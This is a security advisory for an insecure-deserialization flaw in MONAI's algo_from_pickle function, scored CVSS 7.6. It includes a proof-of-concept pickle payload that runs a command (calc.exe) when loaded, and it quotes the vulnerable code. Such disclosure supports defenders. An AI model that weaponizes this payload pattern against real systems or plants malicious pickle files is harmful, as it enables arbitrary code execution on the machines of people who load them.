PT-2026-33562 · Pypi · Monai
Publicado
2026-04-07
·
Atualizado
2026-04-07
CVSS v3.1
7.6
Alta
| Vetor | AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H |
Summary
The
algo from pickle function in monai/auto3dseg/utils.py causes pickle.loads(data bytes) to be executed, and it does not perform any validation on the input parameters. This ultimately leads to insecure deserialization and can result in code execution vulnerabilities.Details
poc
import pickle
import subprocess
class MaliciousAlgo:
def reduce (self):
return (subprocess.call, (['calc.exe'],))
malicious algo bytes = pickle.dumps(MaliciousAlgo())
attack data = {
"algo bytes": malicious algo bytes,
}
attack pickle file = "attack algo.pkl"
with open(attack pickle file, "wb") as f:
f.write(pickle.dumps(attack data))
Generate the malicious file "attack algo.pkl" through POC.
from monai.auto3dseg.utils import algo from pickle
attack pickle file = "attack algo.pkl"
result = algo from pickle(attack pickle file)Ultimately, it will trigger pickle.load through a file to identify the command execution.
Causes of the vulnerability:
def algo from pickle(pkl filename: str, template path: PathLike | None = None, **kwargs: Any) -> Any:
with open(pkl filename, "rb") as f pi:
data bytes = f pi.read()
data = pickle.loads(data bytes)
Impact
Arbitrary code execution
Repair suggestions
Verify the data source and content before deserializing, or use a safe deserialization method
Correção
Deserialization of Untrusted Data
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Enumeração de Fraquezas
Identificadores relacionados
Produtos afetados
Monai